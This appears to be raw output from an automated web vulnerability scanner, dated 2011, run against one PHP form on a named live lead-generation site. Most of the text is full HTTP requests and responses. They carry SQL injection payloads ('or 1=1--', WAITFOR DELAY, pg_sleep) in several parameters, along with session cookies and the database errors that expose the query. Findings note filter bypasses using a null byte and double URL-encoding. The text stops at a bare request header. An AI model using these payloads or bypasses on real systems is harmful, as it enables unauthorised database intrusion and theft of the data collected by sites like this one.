OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:20:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_514_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3%00'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=b36tcacteqaokncjbu2ovbrmh2; path=/ Content-Length: 7326 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3%00''&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qgjqf8p466i58k64op9q8cd6t5; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_515 parameter appears to be vulnerable to SQL injection attacks. The payload 15629927'%20or%201%3d1--%20 was submitted in the attributeId_515 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles15629927'%20or%201%3d1--%20&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7382 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... -- &attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The attributeId_515 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_515 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles'&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es'&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles''&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_555_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_555_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3%2527&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ka5ldhm6c812aoojjqbg3bft02; path=/ Content-Length: 7334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... &attributeId_555_t=3%27&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3%2527%2527&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0gu8u75itgvpgi7bppdjri1234; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_555_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3''&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_556_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_556_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
